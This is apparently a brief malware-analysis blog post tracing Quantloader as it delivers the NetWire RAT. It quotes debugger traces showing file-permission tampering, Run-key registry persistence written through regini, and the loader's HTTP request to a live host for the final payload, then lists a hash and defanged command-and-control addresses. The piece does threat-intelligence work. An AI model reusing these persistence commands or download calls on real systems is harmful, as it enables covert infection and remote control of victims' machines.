Quantloader serving NetWire RAT
Here’s a look at what good old Quant is serving at this time:
Most of the modus operandi is same old — firewall rules, new processes etc.
There isn’t much effort to hide:
Haven’t looked at it much since I published this on MalwareBytes blog but here are a few things its still doing:
“cmd /c echo Y|CACLS \”c:\\users\\rem\\appdata\\roaming\\92804119\\dwm.exe\” /P \”REM:R\””Some good old registry tampering:
“HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run [7]”
Trick to write into the registry:
0061FE34 0040C8C8 “regini C:\\Users\\REM\\AppData\\Local\\Temp\\per”It is using this file that’s created ‘per’ to write the contents into the registry.
0060FE34 |0040B388; |CommandLine = "regini C:\Users\REM\AppData\Local\Temp\per"In order to write it, it used regini.exe with the above commandline. ‘Per’ is just a txt file.
And after the registry entry has been written, it deletes ‘per’.
0060FECC [0040265E ^&@ ; /RETURN from KERNEL32.DeleteFileA to fad.0040265E
0060FED0 /00408170 p@ ; \Name = "C:\Users\REM\AppData\Local\Temp\per"And here’s the call for the final executable:
0061FED0 00408B90 “http://user6097.com/q/index.php?id=92804119&c=1&mk=b58959&il=H&vr=1.73&bt=64"The executable is not there anymore at the time of this publication but all my OSINT resources point to it being:
NetWire RAT
f7e5be410ed0d52889685b8376f1429eMore C2i:
hxxp://vitaetortorvitaesuscipit[.]us
hxxp://naturalherbaltherapy[.]kz/
hxxp://healtyleavingfamily[.]kz
hxxp://s-p-y[.]ml
hxxp://filmsdays[.]top
hxxp://kinnomanna[.]top
hxxp://80[.]87[.]199[.]186
hxxp://coffeecornerss[.]com
hxxp://dogpounding[.]com/
hxxp://straighthoods[.]com
hxxp://191[.]96[.]249[.]69/
hxxp://port[.]so[.]tl
